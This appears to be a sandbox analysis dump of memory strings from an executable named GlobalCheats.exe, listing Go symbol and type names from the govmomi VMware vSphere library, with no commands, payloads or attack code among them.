Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3700
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UninstallServiceRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CollectorAddressUnset).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/xml.printer.WriteByte
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterDasAdmissionControlPolicy).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmfsDatastoreSingleExtentOption).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*GatewayHostNotReachable).GetHostConnectFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DrsDisabledEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfDiskOrderConstraintFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ReleaseManagedSnapshotRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DVSConfigInfo).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ReplicationSpec).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/xml.(*Decoder).Token
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*NoAvailableIp).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*WitnessNodeInfo).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotAccessVmDevice).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsIpPortRange).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UnlicensedVirtualMachinesFoundEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DatacenterConfigSpec
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VcAgentUninstallFailedEvent).GetEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterComputeResourceDVSConfigurationValidation).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfNetworkMappingNotSupported).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*EVCAdmissionFailedCPUVendorUnknown).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UpdateKmsSignedCsrClientCertRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsPortRuntimeChangeEvent).GetEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*TaskEvent).GetEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ThirdPartyLicenseAssignmentFailedFault).GetRuntimeFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostInternetScsiHba).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualUSB).GetVirtualDevice
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: )*[]types.VirtualMachineFeatureRequirement
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*EvaluationLicenseSource).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.CreateTemporaryFileInGuestRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostSriovConfig).GetHostPciPassthruConfig
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsPortLeavePortgroupEvent).GetDvsEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DrsRecoveredFromFailureEvent).GetClusterEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfUnsupportedAttributeValueFault).GetOvfFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*AdminPasswordNotChangedEvent).GetHostEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmFailoverFailed
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 5*types.ArrayOfVirtualMachineQuickStatsMemoryTierStats
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*RecurrentTaskScheduler).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VMotionAcrossNetworkNotSupported).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DisableRulesetRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.UpdateKmipServerRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfNoSpaceOnController).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.CustomFieldDefAddedEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.WaitForUpdatesExRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*WillModifyConfigCpuRequirements).GetMigrationFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfPropertyQualifier).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InsufficientVFlashResourcesFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterResourceUsageSummary).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ToolsImageNotAvailableFault).GetVmToolsUpgradeFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ClusterRuleSpec
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*MultipleCertificatesVerifyFaultFault).GetHostConnectFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*NoDisksToCustomize).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: &*types.UpdateVirtualMachineFilesResult
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*NetworkCopyFaultFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*GuestRegistryKeyAlreadyExists).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*IncompatibleSetting).GetRuntimeFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmFailedMigrateEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualDiskSparseVer2BackingInfo).GetVirtualDeviceFileBackingInfo
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfNoSpaceOnController).GetOvfUnsupportedPackage
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidControllerFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotReconfigureVsanWhenHaEnabledFault).GetVsanFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ConfigureCryptoKeyRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VAppEntityConfigInfo
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: /*types.UpdateVVolVirtualMachineFilesRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*WeeklyTaskScheduler).GetTaskScheduler
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DesiredSoftwareSpecComponentSpec
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualSerialPortDeviceBackingInfo).GetVirtualDeviceBackingInfo
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InsufficientStandbyCpuResource).GetInsufficientResourcesFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidIndexArgumentFault).GetInvalidArgument
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ScheduledTaskCreatedEvent).GetScheduledTaskEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.DatacenterEventArgument
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotAccessNetwork).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VirtualPCIPassthroughVmiopBackingInfo
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmFaultToleranceConfigIssueWrapper).GetVmFaultToleranceIssue
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*PatchMetadataInvalid).GetPatchMetadataInvalid
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualDiskFlatVer2BackingInfo).GetVirtualDeviceBackingInfo
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualSoundBlaster16).GetVirtualSoundCard
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*StorageDrsHmsMoveInProgress).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmDasUpdateErrorEvent).GetVmEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 7*types.VirtualMachineBootOptionsNetworkBootProtocolType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DvsPortConnectedEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostAccessRestrictedToManagementServerFault).GetNotSupported
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.LocalTSMEnabledEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DuplicateVsanNetworkInterface).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VimFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ListGuestAliases
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*PowerOnFtSecondaryTimedout).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotUseNetworkFault).GetVmConfigFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CryptoSpecDeepRecrypt).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.AlarmState
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.CreateSnapshotRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DigestNotSupportedFault).GetVirtualHardwareCompatibilityIssue
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DiskMoveTypeNotSupportedFault).GetMigrationFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ExitedStandbyModeEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfInternalError).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.FormatVffsRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotDisableSnapshot).GetVmConfigFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*SwapDatastoreNotWritableOnHostFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ProfileMetadataProfileSortSpec
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VchaNodeRuntimeInfo
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*EVCModeIllegalByVendor).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostOvercommittedEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmUuidAssignedEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostVffsVolume).GetHostFileSystemVolume
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidIpfixConfigFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*UnSupportedDatastoreForVFlash).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmRenamedEvent).GetVmEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DiskIsUSB).GetVsanFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ConcurrentAccessFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfConnectedDeviceIsoFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostMountInfo).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*PolicyOption).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: *types.VMwareDvsMtuCapability
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostTpmNvTagEventDetails).GetHostTpmEventDetails
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotReconfigureVsanWhenHaEnabled).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmRelocateFailedEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostEnableAdminFailedEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidVmState).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*AlarmScriptFailedEvent).GetAlarmEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfElementInvalidValue).GetOvfFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VFlashModuleNotSupported).GetVmConfigFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostOvercommittedEvent).GetClusterOvercommittedEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmAlreadyExistsInDatacenterFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: &*[]types.VirtualMachineVgpuProfileInfo
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ClusterProfileConfigServiceCreateSpec).GetClusterProfileCreateSpec
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*TooManyGuestLogonsFault).GetGuestOperationsFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ToolsAlreadyUpgraded).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VsanUpgradeSystemMissingHostsInClusterIssue).GetVsanUpgradeSystemPreflightCheckIssue
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotDisconnectHostWithFaultToleranceVmFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*LargeRDMConversionNotSupportedFault).GetMigrationFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*HostMemberUplinkHealthCheckResult).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ChangeLockdownMode
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: (VirtualMachineIdeDiskDevicePartitionInfoFxml:"VirtualMachineIdeDiskDevicePartitionInfo,omitempty" json:"_value"
